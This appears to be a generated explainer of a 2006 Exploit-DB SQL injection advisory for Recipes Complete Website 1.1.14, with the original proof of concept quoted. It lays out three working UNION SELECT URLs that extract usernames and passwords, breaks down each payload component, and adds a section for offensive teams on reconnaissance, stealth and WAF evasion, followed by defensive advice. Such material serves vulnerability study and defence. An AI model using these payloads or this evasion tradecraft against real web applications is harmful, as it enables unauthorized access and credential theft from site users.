Exploiting Recipes Complete Website 1.1.14 via SQL Injection

What this paper is

This paper, published in 2006, details a SQL injection vulnerability found in "Recipes Complete Website" version 1.1.14. The vulnerability allows an attacker to extract sensitive information, specifically usernames and passwords from the users table, by manipulating SQL queries through web application parameters.

Simple technical breakdown

The core of the vulnerability lies in how the web application handles user input for recipeid and categoryid parameters. Instead of properly sanitizing or validating these inputs, the application directly incorporates them into SQL queries.

By injecting specially crafted SQL commands, an attacker can:

1. Alter the intended query: Use UNION SELECT to combine the results of the original query with the results of a new query crafted by the attacker.
2. Extract data: Select specific columns (like login and password) from the users table.
3. Bypass original logic: The /* at the end is a comment in SQL, used to discard the rest of the original query, ensuring only the attacker's injected query is executed.

Complete code and payload walkthrough

The "code" in this paper is not traditional executable code but rather URLs demonstrating the exploit. The payload is embedded within these URLs.

Exploit URLs:

1. http://[target]/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/*
2. http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/*
3. http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20/*

Breakdown of URL components and their practical purpose:

• http://[target]/[path]/: This represents the base URL of the vulnerable web application.

  • Practical Purpose: Identifies the target server and the specific directory where the vulnerable script resides.

• recipe.php / list.php: These are the vulnerable PHP scripts.

  • Practical Purpose: These are the entry points for the attack, as they process the user-supplied parameters.

• ?recipeid=-1 / ?pagenum=0&categoryid=-1: These are the parameters being manipulated.

  • recipeid=-1: In recipe.php, the recipeid parameter is likely used to fetch a specific recipe. By setting it to -1, which is probably an invalid ID, the original query might return no results or an error, making it easier for the UNION SELECT to take over.
  • pagenum=0&categoryid=-1: In list.php, categoryid is likely used to filter a list of recipes by category. Similar to recipeid, -1 is used as an invalid value to facilitate the UNION SELECT. pagenum=0 is likely a default or initial page number.
  • Practical Purpose: These parameters are the injection points. The attacker aims to provide a value that, when inserted into the SQL query, allows for the UNION SELECT to be executed.

• %20: This is the URL-encoded representation of a space character.

  • Practical Purpose: Spaces are crucial for separating SQL keywords and identifiers. URL encoding ensures these spaces are correctly transmitted to the server.

• UNION SELECT: This is the core SQL injection technique. It combines the result set of a SELECT statement with the result set of another SELECT statement.

  • Practical Purpose: Allows the attacker to execute their own SELECT query and append its results to the original query's results.

• login,password,0,0,0,0 / 0,login,0,0 / 0,password,0,0: These are the columns being selected in the injected SELECT statement.

  • login,password,0,0,0,0 (in recipe.php): This attempts to select the login and password columns from the users table. The 0,0,0,0 are placeholder values to match the expected number of columns in the original query. The original query for recipe.php is unknown, but it's implied to return at least 6 columns.
  • 0,login,0,0 (in list.php): This attempts to select the login column. The 0s are placeholders. The original query for list.php is implied to return at least 4 columns.
  • 0,password,0,0 (in list.php): This attempts to select the password column. The 0s are placeholders.
  • Practical Purpose: These are the specific data points the attacker wants to retrieve. The number of columns in the UNION SELECT must match the number of columns in the original query for the SQL statement to be valid.

• FROM users: This specifies the table from which to retrieve data.

  • Practical Purpose: Identifies the target table containing the credentials.

• /*: This is an SQL comment. It tells the database to ignore any characters that follow it in the query.

  • Practical Purpose: This is critical. It effectively truncates the original SQL query after the injected part, preventing syntax errors and ensuring only the attacker's UNION SELECT statement is processed.

Payload Execution Flow:

1. The attacker crafts a URL with injected SQL syntax.
2. The web server receives the request and passes the parameters to the PHP script.
3. The PHP script constructs a SQL query that includes the user-supplied recipeid or categoryid value directly.
4. Because the input is not sanitized, the injected UNION SELECT statement becomes part of the executed SQL query.
5. The database executes the combined query. The UNION SELECT part retrieves login and/or password from the users table.
6. The /* comment discards the remainder of the original query.
7. The results of the UNION SELECT are returned by the database.
8. The PHP script, expecting data from the original query, might display the injected data (login/password) in the web page's output, often in place of legitimate content.

Practical details for offensive operations teams

• Required Access Level: No elevated privileges are required on the target system itself. Network access to the web server is sufficient.
• Lab Preconditions:
  • A local or remote lab environment mimicking the vulnerable "Recipes Complete Website" 1.1.14.
  • A web server (e.g., Apache, Nginx) configured to serve PHP.
  • A database server (e.g., MySQL) accessible by the web server.
  • The users table populated with sample data (login, password).
  • Understanding of the target web application's structure to identify the correct [path] and vulnerable scripts.
• Tooling Assumptions:
  • Web browser for manual testing and observation.
  • A proxy tool (e.g., Burp Suite, OWASP ZAP) is highly recommended for intercepting, modifying, and replaying requests, and for automating the process of discovering the correct number of columns.
  • SQL injection specific tools (e.g., sqlmap) could automate discovery and exploitation, but understanding the manual process is key.
• Execution Pitfalls:
  • Column Mismatch: The most common failure point. The number of columns in the UNION SELECT must match the number of columns in the original query. If it doesn't, the database will return a syntax error. This often requires trial-and-error or using an automated tool to determine the correct number of columns. The paper provides examples for 4 and 6 columns, but the actual number might vary.
  • URL Encoding: Incorrect URL encoding of special characters can lead to the payload not being interpreted correctly by the server or database.
  • Database Type: While the paper doesn't specify, UNION SELECT is common across many SQL databases (MySQL, PostgreSQL, SQL Server, Oracle). However, syntax nuances or specific comment characters (-- vs /* */) might differ.
  • Web Application Firewall (WAF): Modern WAFs are likely to detect and block UNION SELECT statements. The paper is from 2006, so WAF evasion techniques would be necessary for contemporary targets.
  • Application Logic: The vulnerability relies on the application displaying the results of the SQL query. If the application handles errors or displays data in a way that obscures the injected results, extraction might be difficult.
• Tradecraft Considerations:
  • Reconnaissance: Identify the target application version. Understand the URL structure and parameters used by the application.
  • Enumeration: Use a proxy to observe normal application behavior and identify parameters that are likely passed to a database.
  • Discovery: Systematically test parameters for SQL injection vulnerabilities, starting with common techniques like UNION SELECT. Use tools to help determine the number of columns.
  • Extraction: Once a vulnerability is confirmed, extract data incrementally. Avoid overly aggressive queries that might trigger alerts or cause performance issues.
  • Stealth: Use URL encoding, alternative comment styles, and potentially WAF evasion techniques if operating against a protected environment.
  • Documentation: Record all successful exploitation steps, extracted data, and any observed system behavior.

Where this was used and when

• Context: This exploit targets a specific PHP web application called "Recipes Complete Website" version 1.1.14. Such applications were common for managing recipe collections online.
• Timeframe: The paper was published on November 23, 2006. This indicates the vulnerability was active and known around that period. Exploits from this era were often used in the wild by various actors, including script kiddies and more sophisticated attackers, to gain unauthorized access to web application data.

Defensive lessons for modern teams

• Input Validation and Sanitization: This is the most fundamental defense. All user-supplied input, especially data that will be incorporated into database queries, must be rigorously validated and sanitized. This includes:
  • Type checking: Ensure numeric inputs are indeed numbers.
  • Whitelisting: Only allow known-good characters or patterns.
  • Escaping: Properly escape special characters that have meaning in SQL.
• Parameterized Queries (Prepared Statements): This is the gold standard. Instead of concatenating user input into SQL strings, use parameterized queries where the SQL query structure is defined separately from the data. The database engine then treats the input purely as data, not executable code.
• Least Privilege: Database users used by web applications should have only the minimum necessary permissions. For example, a user reading recipes shouldn't have DROP TABLE or DELETE privileges.
• Web Application Firewalls (WAFs): While not a silver bullet, WAFs can provide a valuable layer of defense by detecting and blocking common attack patterns like UNION SELECT. However, they require regular updates and can be bypassed.
• Regular Patching and Updates: Keep all web applications, frameworks, and server software up-to-date to patch known vulnerabilities. This specific exploit targets an old version, highlighting the importance of patching.
• Error Handling: Configure applications to log detailed errors internally but display generic, non-informative error messages to users. This prevents attackers from gaining information through error messages.
• Database Auditing: Monitor database activity for suspicious queries, such as unexpected SELECT statements on sensitive tables or unusual query patterns.

ASCII visual (if applicable)

This exploit is primarily about manipulating HTTP requests and SQL queries. A direct ASCII visual of the exploit itself isn't highly applicable. However, we can visualize the flow of data and the injection point.

+-----------------+      +-----------------+      +-----------------+      +-----------------+
| Attacker's      | ---> | Web Server      | ---> | Vulnerable PHP  | ---> | Database Server |
| Browser/Tool    |      | (Receives Req)  |      | Script          |      | (Executes SQL)  |
+-----------------+      +-----------------+      +-----------------+      +-----------------+
        |                                                  |                      |
        | HTTP Request with                              | Constructs SQL       | Returns Data
        | injected SQL                                   | Query                | (Credentials)
        | (e.g., ?recipeid=-1 UNION SELECT...)           |                      |
        |                                                  |                      |
        +--------------------------------------------------+----------------------+
                                                                   |
                                                                   v
                                                          +-----------------+
                                                          | Attacker sees   |
                                                          | Credentials     |
                                                          +-----------------+

Explanation:

• The attacker sends a crafted HTTP request.
• The web server passes this request to the vulnerable PHP script.
• The PHP script, due to lack of sanitization, directly embeds the malicious SQL into a query it sends to the database.
• The database executes the query, including the attacker's UNION SELECT.
• The database returns the requested data (login/password) back through the PHP script.
• The attacker observes the extracted credentials, often displayed on the web page.

Source references

• Paper ID: 2834
• Paper Title: Recipes Complete Website 1.1.14 - SQL Injection
• Author: GregStar
• Published: 2006-11-23
• Keywords: PHP, webapps
• Paper URL: https://www.exploit-db.com/papers/2834
• Raw URL: https://www.exploit-db.com/raw/2834

Original Exploit-DB Content (Verbatim)

*************************************************************************************************************************#
                                                              					          		 #
			               			 Coding 4 Fun     						 #	
			                                      						  		 #
*************************************************************************************************************************#
													  		 #
* Recipes Complete Website 1.1.14  (http://www.easysitenetwork.com/modules.php?name=Content&pa=showpage&pid=2) ; 	 #
													  		 #	
* Class = SQL Injection ;										  		 #
   													  		 #
* Download = http://www.easysitenetwork.com/modules.php?name=Downloads&d_op=getit&lid=3 ;				 #
													  		 #
* Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ;				          		 #
												  	  		 #
-------------------------------------------------------------------------------------------------------------------------#
													  		 #
													  		 #
- PoC:												          		 #
													  		 #
http://[target]/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/* 		 #
															 #
-------------------------------------------------------------------------------------------------------------------------#
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/*  - login      #											  
													  		 #
-------------------------------------------------------------------------------------------------------------------------#
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20/* - password #
															 #
*************************************************************************************************************************#													  				
Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch.	  		 #
												          		 #
*************************************************************************************************************************#

# milw0rm.com [2006-11-23]